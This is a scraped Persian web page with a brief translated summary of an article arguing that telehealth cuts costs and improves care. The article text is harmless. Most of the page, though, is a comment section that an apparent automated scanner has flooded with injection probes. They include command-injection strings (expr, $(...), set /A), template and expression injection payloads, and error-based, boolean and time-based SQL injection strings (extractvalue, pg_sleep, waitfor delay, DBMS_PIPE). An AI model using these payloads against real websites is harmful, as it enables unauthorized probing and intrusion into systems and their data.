گروه محصولات

عنوان مقاله: دوران سلامت از راه دور تازه شروع شده است

گزیده مدیریت 230

By Robert Pearl and Brian Wayling

نوشته: رابرت پرل و برایان وینلینگ

ترجمه: دکتر ناهید مال عزیزی

برخلاف آن‌چه بسیاری از افراد فکر می‌کنند، مراقبت‌های مجازی سلامت که به‌عنوان پزشکی از راه دور یا سلامت از راه دور نیز شناخته می‌شود، بسیار موثرتر از یک درمان دیجیتال ناکارآمد و ارزان‌قیمت در مراقبت‏های حضوری است. این نوع مراقبت‌ها اگر به‌درستی استفاده شوند، باعث بهبود سلامتی بیمار و کاهش هزینه‌ها می‌شوند و مراقبت‌های یکسان و در دسترس را برای تمام افراد از طریق یک گوشی هوشمند امکان‌پذیر می‌سازند. استفاده از این نوع مراقبت‌ها در طول همه‌گیری کووید‌۱۹ اوج گرفت و بنابه نظر پژوهشگران، فراهم‌کنندگان آن‌ها در سراسر دنیا باید از حداکثر قابلیت آن حتی بعد از دوران همه‌گیری بهره‌برداری کنند.

نویسندگان مقاله نظر خوانندگان را به دو موسسه کایزرپرمننته و اینترمانتین‌هلث‌کر جلب می‌کنند که از نخستین و موثرترین کاربران مراقبت‌های بهداشتی از راه دور در آمریکا هستند. آن‌ها نشان می‌دهند چگونه سیستم سلامت از راه دور می‌تواند باعث کاهش هزینه‌های مراجعات غیرضروری به اورژانس، کاهش بحران بیماری‌های مزمن، پرداختن به نابرابری‌ها در مراقبت‌های بهداشتی، انجام مراقبت‌های سریع‌تر و موثرتر و دسترسی به بهترین پزشکان شود. آن‌ها ملزومات طرحی کلی برای ایجاد یک سیستم مراقبت بهداشتی از راه دور را مشخص می‌کنند. کارفرمایانی که در حال حاضر بیمه سلامت را برای نیمی از جمعیت آمریکا فراهم می‌کنند می‌توانند با همکاری با یکدیگر تغییرات جدیدی در نحوه ارائه خدمات بهداشتی و سیستم بازپرداخت هزینه‌ها ایجاد کنند که نتیجه آن صرفه‌جویی میلیارد دلاری سالانه خواهد بود.

انصراف از نظر
نظرات
20/05/1402 07:13 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456
expr 929910692 + 839431011

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456|expr 942494983 + 826771698

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

/*1*/{{804373834+877655663}}

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456$(expr 984901195 + 865912385)

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

123456

20/05/1402 07:19 ق.ظ
123456

${@var_dump(md5(462854847))};

20/05/1402 07:19 ق.ظ
123456

${902495505+804617335}

20/05/1402 07:19 ق.ظ
123456

123456&set /A 909437689+927348960

20/05/1402 07:20 ق.ظ
123456'and/**/extractvalue(1,concat(char(126),md5(1096637878)))and'

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456

'-var_dump(md5(411739687))-'

20/05/1402 07:20 ق.ظ
${885036014+986927101}

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456

expr 850667473 + 961436719

20/05/1402 07:20 ق.ظ
${@var_dump(md5(540755168))};

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456 expr 889109505 + 843373266

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
'-var_dump(md5(922510432))-'

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456"and/**/extractvalue(1,concat(char(126),md5(1323895384)))and"

123456

20/05/1402 07:20 ق.ظ
123456|expr 965269291 + 969445903

123456

20/05/1402 07:20 ق.ظ
123456

${856947830+875764870}

20/05/1402 07:20 ق.ظ
123456$(expr 832733701 + 825860865)

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
extractvalue(1,concat(char(126),md5(1801618105)))

123456

20/05/1402 07:20 ق.ظ
123456&set /A 838577582+970402318

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456'and(select'1'from/**/cast(md5(1946471531)as/**/int))>'0

123456

20/05/1402 07:20 ق.ظ
expr 916437512 + 951548688

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
123456/**/and/**/cast(md5('1736838312')as/**/int)>0

123456

20/05/1402 07:20 ق.ظ
123456

123456

20/05/1402 07:20 ق.ظ
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1613361218')))

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1007052839')))>'0

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456鎈'"\(

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456'"\(

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:21 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456/**/and+4=4

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456/**/and+2=8

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456'and'i'='i

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456'and'b'='z

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456

20/05/1402 07:22 ق.ظ
123456

123456"and"f"="f

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456"and"c"="e

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

(select*from(select+sleep(0)union/**/select+1)a)

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

(select*from(select+sleep(7)union/**/select+1)a)

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='

20/05/1402 07:23 ق.ظ
123456

123456

20/05/1402 07:23 ق.ظ
123456

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

20/05/1402 07:23 ق.ظ
123456

123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="

20/05/1402 07:23 ق.ظ
123456

123456'and/**/extractvalue(1,concat(char(126),md5(1789556359)))and'

20/05/1402 07:23 ق.ظ
123456

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

20/05/1402 07:23 ق.ظ
123456

123456"and/**/extractvalue(1,concat(char(126),md5(1450611325)))and"

20/05/1402 07:24 ق.ظ
123456

extractvalue(1,concat(char(126),md5(1732063328)))

20/05/1402 07:24 ق.ظ
123456

123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/

20/05/1402 07:24 ق.ظ
123456

123456'and(select'1'from/**/cast(md5(1624374779)as/**/int))>'0

20/05/1402 07:24 ق.ظ
123456

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

20/05/1402 07:24 ق.ظ
123456

123456/**/and/**/cast(md5('1577595122')as/**/int)>0

20/05/1402 07:24 ق.ظ
123456

123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0

20/05/1402 07:24 ق.ظ
123456

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1538322954')))

20/05/1402 07:24 ق.ظ
123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

20/05/1402 07:24 ق.ظ
123456

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1917232234')))>'0

20/05/1402 07:24 ق.ظ
123456

123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/

20/05/1402 07:24 ق.ظ
123456

123456鎈'"\(

20/05/1402 07:24 ق.ظ
123456

123456'and(select+1)>0waitfor/**/delay'0:0:0

20/05/1402 07:24 ق.ظ
123456

123456'"\(

20/05/1402 07:24 ق.ظ
123456

123456'and(select+1)>0waitfor/**/delay'0:0:7

20/05/1402 07:24 ق.ظ
123456

123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('l',0)

20/05/1402 07:25 ق.ظ
123456

123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('q',7)

20/05/1402 07:25 ق.ظ
123456

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',0)='p

20/05/1402 07:25 ق.ظ
123456

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',7)='i

20/05/1402 07:25 ق.ظ
123456/**/and+1=1

123456

20/05/1402 07:25 ق.ظ
123456/**/and+2=8

123456

20/05/1402 07:25 ق.ظ
123456'and'z'='z

123456

20/05/1402 07:25 ق.ظ
123456'and'r'='h

123456

20/05/1402 07:25 ق.ظ
123456"and"c"="c

123456

20/05/1402 07:25 ق.ظ
123456"and"s"="r

123456

20/05/1402 07:26 ق.ظ
(select*from(select+sleep(0)union/**/select+1)a)

123456

20/05/1402 07:26 ق.ظ
(select*from(select+sleep(7)union/**/select+1)a)

123456

20/05/1402 07:26 ق.ظ
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

20/05/1402 07:26 ق.ظ
123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='

123456

20/05/1402 07:26 ق.ظ
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

20/05/1402 07:26 ق.ظ
123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="

123456

20/05/1402 07:26 ق.ظ
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

123456

20/05/1402 07:26 ق.ظ
123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/

123456

20/05/1402 07:26 ق.ظ
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

20/05/1402 07:26 ق.ظ
123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0

123456

20/05/1402 07:27 ق.ظ
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

123456

20/05/1402 07:27 ق.ظ
123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/

123456

20/05/1402 07:27 ق.ظ
123456'and(select+1)>0waitfor/**/delay'0:0:0

123456

20/05/1402 07:27 ق.ظ
123456'and(select+1)>0waitfor/**/delay'0:0:7

123456

20/05/1402 07:27 ق.ظ
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('b',0)

123456

20/05/1402 07:27 ق.ظ
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('h',7)

123456

20/05/1402 07:27 ق.ظ
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z

123456

20/05/1402 07:27 ق.ظ
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',7)='t

123456